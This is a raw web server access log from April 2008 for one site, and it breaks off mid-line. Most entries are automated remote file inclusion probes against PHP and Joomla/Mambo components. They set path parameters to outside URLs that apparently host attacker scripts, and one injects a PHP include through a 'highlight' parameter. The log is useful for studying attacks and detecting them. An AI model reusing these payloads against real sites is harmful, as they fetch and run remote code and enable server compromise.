200.48.204.130 - - [07/Apr/2008:13:49:48 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.48.204.130 - - [07/Apr/2008:13:49:48 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.232.51.146 - - [07/Apr/2008:13:49:58 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.geocities.com/belahan.memek/albania.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.213.0.1 - - [07/Apr/2008:13:50:03 -0700] "GET /logs/access_080219.log//main.php?sayfa=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.210.91.50 - - [07/Apr/2008:13:50:20 -0700] "GET /logs/inc/cmses/aedating4CMS.php?dir[inc]=http://www.hairbyerin.net/TotalCalendar_2.4/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
207.210.91.50 - - [07/Apr/2008:13:50:20 -0700] "GET /inc/cmses/aedating4CMS.php?dir[inc]=http://www.hairbyerin.net/TotalCalendar_2.4/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
212.241.251.88 - - [07/Apr/2008:13:50:24 -0700] "GET /logs/access_080313.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:13:50:27 -0700] "GET /logs/access_080308.log/index.php?side=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:13:50:28 -0700] "GET /logs/access_080308.log/index.php?side=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:13:50:28 -0700] "GET /logs/index.php?side=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:13:50:28 -0700] "GET /logs/index.php?side=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.11.238.233 - - [07/Apr/2008:13:50:37 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.53.114.42 - - [07/Apr/2008:13:50:38 -0700] "GET /logs/access_080215.log//?mosConfig_absolute_path=http://www.xentorteam.altervista.org/Nuova_cartella/text.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.53.73.178 - - [07/Apr/2008:13:50:42 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://theninjalegion.com/etc/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
217.112.35.27 - - [07/Apr/2008:13:50:43 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
74.53.73.178 - - [07/Apr/2008:13:50:44 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://theninjalegion.com/etc/test.txt??? HTTP/1.1" 200 4139 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
217.112.35.27 - - [07/Apr/2008:13:50:46 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
67.15.8.53 - - [07/Apr/2008:13:51:08 -0700] "GET /logs/access_080215.log//errors.php?error=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.127.40.40 - - [07/Apr/2008:13:51:11 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.127.40.40 - - [07/Apr/2008:13:51:12 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
216.127.40.40 - - [07/Apr/2008:13:51:12 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:13:51:12 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:13:51:13 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:13:51:13 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:13:51:17 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:13:51:17 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:13:51:18 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.240.211.107 - - [07/Apr/2008:13:51:23 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.240.211.107 - - [07/Apr/2008:13:51:24 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 200 50 "-" "libwww-perl/5.803" "www.dmulk.com"
66.240.211.107 - - [07/Apr/2008:13:51:24 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.50.209.214 - - [07/Apr/2008:13:51:37 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 200 50 "-" "libwww-perl/5.808" "www.dmulk.com"
69.50.209.214 - - [07/Apr/2008:13:51:55 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.249.105.111 - - [07/Apr/2008:13:51:56 -0700] "GET /logs/access_080130.log/include/common_function.php?_config[site_path]=http://h1.ripway.com/raru/xx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.249.105.111 - - [07/Apr/2008:13:51:56 -0700] "GET /logs/access_080130.log/include/common_function.php?_config[site_path]=http://h1.ripway.com/raru/xx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.249.105.111 - - [07/Apr/2008:13:51:56 -0700] "GET /logs/access_080130.log/include/common_function.php?_config[site_path]=http://h1.ripway.com/raru/xx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.249.105.111 - - [07/Apr/2008:13:51:56 -0700] "GET /logs/access_080130.log/include/common_function.php?_config[site_path]=http://h1.ripway.com/raru/xx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.249.105.111 - - [07/Apr/2008:13:51:56 -0700] "GET /include/common_function.php?_config[site_path]=http://h1.ripway.com/raru/xx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.249.105.111 - - [07/Apr/2008:13:51:56 -0700] "GET /include/common_function.php?_config[site_path]=http://h1.ripway.com/raru/xx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.249.105.111 - - [07/Apr/2008:13:51:56 -0700] "GET /include/common_function.php?_config[site_path]=http://h1.ripway.com/raru/xx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.249.105.111 - - [07/Apr/2008:13:51:56 -0700] "GET /include/common_function.php?_config[site_path]=http://h1.ripway.com/raru/xx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.249.105.111 - - [07/Apr/2008:13:51:57 -0700] "GET /logs/include/common_function.php?_config[site_path]=http://h1.ripway.com/raru/xx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.249.105.111 - - [07/Apr/2008:13:51:57 -0700] "GET /logs/include/common_function.php?_config[site_path]=http://h1.ripway.com/raru/xx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.249.105.111 - - [07/Apr/2008:13:51:57 -0700] "GET /logs/include/common_function.php?_config[site_path]=http://h1.ripway.com/raru/xx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.249.105.111 - - [07/Apr/2008:13:51:57 -0700] "GET /logs/include/common_function.php?_config[site_path]=http://h1.ripway.com/raru/xx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.249.105.111 - - [07/Apr/2008:13:51:57 -0700] "GET /logs/access_080130.log/include/common_function.php?_config[site_path]=http://h1.ripway.com/raru/xx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.249.105.111 - - [07/Apr/2008:13:51:57 -0700] "GET /include/common_function.php?_config[site_path]=http://h1.ripway.com/raru/xx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.249.105.111 - - [07/Apr/2008:13:51:58 -0700] "GET /logs/include/common_function.php?_config[site_path]=http://h1.ripway.com/raru/xx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.249.105.111 - - [07/Apr/2008:13:51:59 -0700] "GET /logs/access_080130.log/include/common_function.php?_config[site_path]=http://h1.ripway.com/raru/xx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.249.105.111 - - [07/Apr/2008:13:52:00 -0700] "GET /include/common_function.php?_config[site_path]=http://h1.ripway.com/raru/xx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.212.1.227 - - [07/Apr/2008:13:52:00 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.249.105.111 - - [07/Apr/2008:13:52:00 -0700] "GET /logs/include/common_function.php?_config[site_path]=http://h1.ripway.com/raru/xx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.64.50.3 - - [07/Apr/2008:13:52:03 -0700] "GET /logs/access_080211.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.9kuukautta.net/verkkokauppa/images/aksi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.249.105.111 - - [07/Apr/2008:13:52:04 -0700] "GET /logs/access_080130.log/include/common_function.php?_config[site_path]=http://h1.ripway.com/raru/xx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.249.105.111 - - [07/Apr/2008:13:52:04 -0700] "GET /include/common_function.php?_config[site_path]=http://h1.ripway.com/raru/xx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.249.105.111 - - [07/Apr/2008:13:52:04 -0700] "GET /logs/include/common_function.php?_config[site_path]=http://h1.ripway.com/raru/xx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.126.144.75 - - [07/Apr/2008:13:52:23 -0700] "GET /logs/access_080130.log/include/common_function.php?_config[site_path]=http://h1.ripway.com/raru/xx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.126.144.75 - - [07/Apr/2008:13:52:24 -0700] "GET /include/common_function.php?_config[site_path]=http://h1.ripway.com/raru/xx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.126.144.75 - - [07/Apr/2008:13:52:24 -0700] "GET /logs/include/common_function.php?_config[site_path]=http://h1.ripway.com/raru/xx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.225.192.202 - - [07/Apr/2008:13:52:26 -0700] "GET /logs/access_080312.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.192.202 - - [07/Apr/2008:13:52:26 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.192.202 - - [07/Apr/2008:13:52:26 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:13:52:33 -0700] "GET /logs/access_080215.log/index.php?x=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:13:52:33 -0700] "GET /logs/access_080215.log/index.php?x=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:13:52:34 -0700] "GET /index.php?x=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
216.127.40.40 - - [07/Apr/2008:13:52:36 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:13:52:36 -0700] "GET /index.php?x=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:13:52:37 -0700] "GET /logs/index.php?x=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:13:52:37 -0700] "GET /logs/index.php?x=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.230.71.1 - - [07/Apr/2008:13:52:44 -0700] "GET /logs/access_080211.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://boxstr.com/files/1311840_mm1dt/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.230.71.1 - - [07/Apr/2008:13:52:45 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://boxstr.com/files/1311840_mm1dt/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.171.66.229 - - [07/Apr/2008:13:53:07 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.22.204.88 - - [07/Apr/2008:13:53:35 -0700] "GET /logs/access_080313.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://scanbax.we.bs/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.88 - - [07/Apr/2008:13:53:36 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://scanbax.we.bs/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.88 - - [07/Apr/2008:13:53:36 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://scanbax.we.bs/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:13:53:44 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:13:53:45 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 200 50 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:13:53:46 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:13:53:49 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:13:53:50 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 200 50 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:13:53:50 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.240.211.107 - - [07/Apr/2008:13:54:04 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.246.2.29 - - [07/Apr/2008:13:54:05 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.2.29 - - [07/Apr/2008:13:54:05 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.2.29 - - [07/Apr/2008:13:54:06 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.230.71.1 - - [07/Apr/2008:13:54:07 -0700] "GET /logs/access_080122.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://boxstr.com/files/1311840_mm1dt/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.218.240 - - [07/Apr/2008:13:54:07 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=ftp://85.25.48.60/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
62.75.218.240 - - [07/Apr/2008:13:54:07 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=ftp://85.25.48.60/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
66.64.50.3 - - [07/Apr/2008:13:54:12 -0700] "GET /logs/access_080211.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.9kuukautta.net/verkkokauppa/images/aksi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.185.193.111 - - [07/Apr/2008:13:54:29 -0700] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.eenpotnat.com/modules/poll/me.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
91.185.193.111 - - [07/Apr/2008:13:54:29 -0700] "GET //components/com_forum/download.php?phpbb_root_path=http://www.eenpotnat.com/modules/poll/me.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
87.249.105.111 - - [07/Apr/2008:13:54:35 -0700] "GET /logs/access_080217.log/include/common_function.php?_config[site_path]=http://h1.ripway.com/raru/xx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.249.105.111 - - [07/Apr/2008:13:54:35 -0700] "GET /logs/access_080217.log/include/common_function.php?_config[site_path]=http://h1.ripway.com/raru/xx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.249.105.111 - - [07/Apr/2008:13:54:35 -0700] "GET /logs/access_080217.log/include/common_function.php?_config[site_path]=http://h1.ripway.com/raru/xx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.249.105.111 - - [07/Apr/2008:13:54:35 -0700] "GET /logs/access_080217.log/include/common_function.php?_config[site_path]=http://h1.ripway.com/raru/xx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.185.193.111 - - [07/Apr/2008:13:54:36 -0700] "GET /access/login.php?path_to_root=http://www.eenpotnat.com/modules/poll/me.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
91.185.193.111 - - [07/Apr/2008:13:54:36 -0700] "GET /logs/access/login.php?path_to_root=http://www.eenpotnat.com/modules/poll/me.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
87.249.105.111 - - [07/Apr/2008:13:54:37 -0700] "GET /logs/access_080217.log/include/common_function.php?_config[site_path]=http://h1.ripway.com/raru/xx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.52.95 - - [07/Apr/2008:13:54:38 -0700] "GET /bikes/dteel/2008_01_27/ZbThumbnail.info HTTP/1.0" 200 179511 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.249.105.111 - - [07/Apr/2008:13:54:40 -0700] "GET /logs/access_080217.log/include/common_function.php?_config[site_path]=http://h1.ripway.com/raru/xx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.249.105.111 - - [07/Apr/2008:13:54:42 -0700] "GET /logs/access_080217.log/include/common_function.php?_config[site_path]=http://h1.ripway.com/raru/xx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [07/Apr/2008:13:54:50 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.186.1.54 - - [07/Apr/2008:13:55:18 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
66.240.211.107 - - [07/Apr/2008:13:55:28 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 200 50 "-" "libwww-perl/5.803" "www.dmulk.com"
200.48.204.130 - - [07/Apr/2008:13:55:30 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
61.222.36.82 - - [07/Apr/2008:13:55:48 -0700] "GET /logs/access_080118.log//inc/cmses/aedating4CMS.php?dir[inc]=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.126.144.75 - - [07/Apr/2008:13:56:19 -0700] "GET /logs/access_080217.log/include/common_function.php?_config[site_path]=http://h1.ripway.com/raru/xx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.18.207.65 - - [07/Apr/2008:13:56:34 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
219.166.61.155 - - [07/Apr/2008:13:56:53 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.phuskalar.pl////////images/test.tx